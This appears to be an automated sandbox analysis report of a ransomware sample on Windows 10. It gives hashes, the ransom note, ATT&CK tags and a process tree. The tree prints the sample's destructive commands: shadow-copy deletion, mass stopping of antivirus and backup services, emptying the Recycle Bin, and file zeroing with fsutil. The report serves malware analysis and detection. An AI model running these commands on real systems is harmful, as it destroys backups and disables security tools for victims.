1c83ff2394da76e6296e6ad72c40dbde107704a711bbd08b633c57587230ccf8

Analysis

max time kernel
144s
max time network
143s
platform
windows10_x64
resource
win10
submitted
18/06/2020, 02:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

90a909a4508aa899b4be372e7de6f500.exe
Size

62KB
MD5

90a909a4508aa899b4be372e7de6f500
SHA1

7bb201923d7055c149858d087c0a44ab9530536e
SHA256

1c83ff2394da76e6296e6ad72c40dbde107704a711bbd08b633c57587230ccf8
SHA512

57b732ac3827878c81ed45e26001695c42240b6eb16d4c9d0ecd34d41ede0d598983c156a5c22c8a5f79e81437ed308e0414571cda1c0725ab7b2b3ef9f683cf

Score

10^/10

ransomware spyware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\DEAL_FOR_ACCESS_TO_YOUR_FILES.txt

Ransom Note

*** WARNING *** Important Files In This Machine Has LOCKED. Your Files ONLY Can Recover By Special Unlocker. Important And Private Documents Also COPIED. After This Message Time For Payment Is Limited. After Time Limit Next Payment Will Be x2 Next Step Is Publish Files And Document. You Can Test 1 File (Max. 2MB) To Unlock [email protected] Key Identifier: On5TrSwffaf8cdrYWygamPz+sRvUObZ84oiaI2t3MVfipXn+mgBPo1hizJfpCpOBm6Lany40ycuFkjhm4s0WebPgOzJTu/iY0l4UH/Csw/uv7Cr/MK2SRJeW4WHUBxpu/8lS2SzQ/67rSUPRtk8zlp43C9euJM5/SK/khT3kkrofhaUhqY01sHQLdNVwPzI9ohDM6dQuXv4wJLpTUa/Fl7RFRlLNLuAQfBUX1vg0543Y8QTuUuFDpUKozZes5jdah/U8tqz9uUy6pim1QhyluiH2Sx8RNRcuPddlH+SKnsqgY3JdYOQ1wwNf6PZQZQhqSx43vxPVMRZjKGb176AR4g==

Emails

[email protected]

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	90a909a4508aa899b4be372e7de6f500.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Enumerates connected drives 3 TTPs 18 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
3632	vssadmin.exe
3948	vssadmin.exe
740	vssadmin.exe
496	vssadmin.exe
476	vssadmin.exe
3940	vssadmin.exe
3924	vssadmin.exe
3824	vssadmin.exe
3796	vssadmin.exe
3820	vssadmin.exe
3584	vssadmin.exe
3928	vssadmin.exe
3448	vssadmin.exe
4008	vssadmin.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
3832	taskkill.exe
776	taskkill.exe
2960	taskkill.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
3916	notepad.exe
3804	NOTEPAD.EXE

Runs net.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
2684	PING.EXE
2916	PING.EXE
3836	PING.EXE
3884	PING.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1308	WINWORD.EXE
1308	WINWORD.EXE

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	2896	90a909a4508aa899b4be372e7de6f500.exe
Token: SeDebugPrivilege	3832	taskkill.exe
Token: SeDebugPrivilege	776	taskkill.exe
Token: SeDebugPrivilege	2960	taskkill.exe
Token: SeBackupPrivilege	3876	vssvc.exe
Token: SeRestorePrivilege	3876	vssvc.exe
Token: SeAuditPrivilege	3876	vssvc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2896	90a909a4508aa899b4be372e7de6f500.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
2896	90a909a4508aa899b4be372e7de6f500.exe

Suspicious use of SetWindowsHookEx 15 IoCs

pid	Process
1308	WINWORD.EXE
1308	WINWORD.EXE
1308	WINWORD.EXE
1308	WINWORD.EXE
1308	WINWORD.EXE
1308	WINWORD.EXE
1308	WINWORD.EXE
1308	WINWORD.EXE
1308	WINWORD.EXE
1308	WINWORD.EXE
1308	WINWORD.EXE
1308	WINWORD.EXE
1308	WINWORD.EXE
1308	WINWORD.EXE
1308	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2896 wrote to memory of 3520	2896	90a909a4508aa899b4be372e7de6f500.exe	67
PID 2896 wrote to memory of 3520	2896	90a909a4508aa899b4be372e7de6f500.exe	67
PID 2896 wrote to memory of 3520	2896	90a909a4508aa899b4be372e7de6f500.exe	67
PID 3520 wrote to memory of 3840	3520	net.exe	69
PID 3520 wrote to memory of 3840	3520	net.exe	69
PID 3520 wrote to memory of 3840	3520	net.exe	69
PID 2896 wrote to memory of 3984	2896	90a909a4508aa899b4be372e7de6f500.exe	70
PID 2896 wrote to memory of 3984	2896	90a909a4508aa899b4be372e7de6f500.exe	70
PID 2896 wrote to memory of 3984	2896	90a909a4508aa899b4be372e7de6f500.exe	70
PID 3984 wrote to memory of 3828	3984	net.exe	72
PID 3984 wrote to memory of 3828	3984	net.exe	72
PID 3984 wrote to memory of 3828	3984	net.exe	72
PID 2896 wrote to memory of 3872	2896	90a909a4508aa899b4be372e7de6f500.exe	73
PID 2896 wrote to memory of 3872	2896	90a909a4508aa899b4be372e7de6f500.exe	73
PID 2896 wrote to memory of 3872	2896	90a909a4508aa899b4be372e7de6f500.exe	73
PID 3872 wrote to memory of 3888	3872	net.exe	75
PID 3872 wrote to memory of 3888	3872	net.exe	75
PID 3872 wrote to memory of 3888	3872	net.exe	75
PID 2896 wrote to memory of 3868	2896	90a909a4508aa899b4be372e7de6f500.exe	76
PID 2896 wrote to memory of 3868	2896	90a909a4508aa899b4be372e7de6f500.exe	76
PID 2896 wrote to memory of 3868	2896	90a909a4508aa899b4be372e7de6f500.exe	76
PID 3868 wrote to memory of 3928	3868	net.exe	78
PID 3868 wrote to memory of 3928	3868	net.exe	78
PID 3868 wrote to memory of 3928	3868	net.exe	78
PID 2896 wrote to memory of 2668	2896	90a909a4508aa899b4be372e7de6f500.exe	79
PID 2896 wrote to memory of 2668	2896	90a909a4508aa899b4be372e7de6f500.exe	79
PID 2896 wrote to memory of 2668	2896	90a909a4508aa899b4be372e7de6f500.exe	79
PID 2668 wrote to memory of 3380	2668	net.exe	81
PID 2668 wrote to memory of 3380	2668	net.exe	81
PID 2668 wrote to memory of 3380	2668	net.exe	81
PID 2896 wrote to memory of 3384	2896	90a909a4508aa899b4be372e7de6f500.exe	82
PID 2896 wrote to memory of 3384	2896	90a909a4508aa899b4be372e7de6f500.exe	82
PID 2896 wrote to memory of 3384	2896	90a909a4508aa899b4be372e7de6f500.exe	82
PID 3384 wrote to memory of 2916	3384	net.exe	84
PID 3384 wrote to memory of 2916	3384	net.exe	84
PID 3384 wrote to memory of 2916	3384	net.exe	84
PID 2896 wrote to memory of 2760	2896	90a909a4508aa899b4be372e7de6f500.exe	85
PID 2896 wrote to memory of 2760	2896	90a909a4508aa899b4be372e7de6f500.exe	85
PID 2896 wrote to memory of 2760	2896	90a909a4508aa899b4be372e7de6f500.exe	85
PID 2760 wrote to memory of 2336	2760	net.exe	87
PID 2760 wrote to memory of 2336	2760	net.exe	87
PID 2760 wrote to memory of 2336	2760	net.exe	87
PID 2896 wrote to memory of 2116	2896	90a909a4508aa899b4be372e7de6f500.exe	88
PID 2896 wrote to memory of 2116	2896	90a909a4508aa899b4be372e7de6f500.exe	88
PID 2896 wrote to memory of 2116	2896	90a909a4508aa899b4be372e7de6f500.exe	88
PID 2116 wrote to memory of 2976	2116	net.exe	90
PID 2116 wrote to memory of 2976	2116	net.exe	90
PID 2116 wrote to memory of 2976	2116	net.exe	90
PID 2896 wrote to memory of 3652	2896	90a909a4508aa899b4be372e7de6f500.exe	91
PID 2896 wrote to memory of 3652	2896	90a909a4508aa899b4be372e7de6f500.exe	91
PID 2896 wrote to memory of 3652	2896	90a909a4508aa899b4be372e7de6f500.exe	91
PID 3652 wrote to memory of 3840	3652	net.exe	93
PID 3652 wrote to memory of 3840	3652	net.exe	93
PID 3652 wrote to memory of 3840	3652	net.exe	93
PID 2896 wrote to memory of 3812	2896	90a909a4508aa899b4be372e7de6f500.exe	94
PID 2896 wrote to memory of 3812	2896	90a909a4508aa899b4be372e7de6f500.exe	94
PID 2896 wrote to memory of 3812	2896	90a909a4508aa899b4be372e7de6f500.exe	94
PID 3812 wrote to memory of 3828	3812	net.exe	96
PID 3812 wrote to memory of 3828	3812	net.exe	96
PID 3812 wrote to memory of 3828	3812	net.exe	96
PID 2896 wrote to memory of 3816	2896	90a909a4508aa899b4be372e7de6f500.exe	97
PID 2896 wrote to memory of 3816	2896	90a909a4508aa899b4be372e7de6f500.exe	97
PID 2896 wrote to memory of 3816	2896	90a909a4508aa899b4be372e7de6f500.exe	97
PID 3816 wrote to memory of 3884	3816	net.exe	99

C:\Users\Admin\AppData\Local\Temp\90a909a4508aa899b4be372e7de6f500.exe
"C:\Users\Admin\AppData\Local\Temp\90a909a4508aa899b4be372e7de6f500.exe"
1⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2896
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop avpsus /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3520
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:3840
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3984
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:3828
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mfewc /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3872
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:3888
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3868
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:3928
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2668
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:3380
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3384
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:2916
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2760
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:2336
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2116
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:2976
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3652
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:3840
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3812
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:3828
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3816
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:3884
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:3800
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:3936
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:3144
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:3264
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:3320
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:2660
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:400
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:612
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:2980
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:2000
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:2888
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:3572
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:3808
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:3828
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:3768
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:3944
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:3936
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:3772
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:3388
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:1656
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:64
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:1336
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:732
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:2052
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:728
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:3572
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:3648
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:4052
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:992
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:996
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:3376
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:3916
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:3772
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:4008
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:780
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:736
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:2044
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:2684
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:3644
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:3024
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:3856
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:3828
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:3884
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:3380
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:3916
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:3392
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:3588
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop CAARCUpdateSvc /y
    3⤵
    PID:3640
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:2288
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:3908
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:2976
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:972
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:3024
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:3776
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3832
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:776
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2960
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:3632
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3796
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:3948
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:740
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:496
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:3820
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:3584
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:476
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:3940
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:3924
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:3448
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:3824
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:3928
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:4008
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:3764
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpEF13.bat
  2⤵
  PID:3880
- - C:\Windows\SysWOW64\mountvol.exe
    mountvol
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\find.exe
    find "}\"
    3⤵
    PID:3572
- - C:\Windows\SysWOW64\mountvol.exe
    mountvol !freedrive!: \\?\Volume{9563bb1f-0000-0000-0000-500600000000}\
    3⤵
    PID:2052
- - C:\Windows\SysWOW64\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:2684
- - C:\Windows\SysWOW64\mountvol.exe
    mountvol !freedrive!: \\?\Volume{9563bb1f-0000-0000-0000-100000000000}\
    3⤵
    PID:2344
- - C:\Windows\SysWOW64\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:2916
- - C:\Windows\SysWOW64\mountvol.exe
    mountvol !freedrive!: \\?\Volume{d61488bd-b008-11ea-95e4-806e6f6e6963}\
    3⤵
    PID:3572
- - C:\Windows\SysWOW64\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:3836
- C:\Windows\SysWOW64\notepad.exe
  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\DEAL_FOR_ACCESS_TO_YOUR_FILES.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3916
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:3388
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:3884
- - C:\Windows\SysWOW64\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:1188
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\90a909a4508aa899b4be372e7de6f500.exe
  2⤵
  PID:796
- - C:\Windows\SysWOW64\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:1768

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3876

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3092

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\EnableFind.rtf" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1308

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\OptimizeRename.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:3804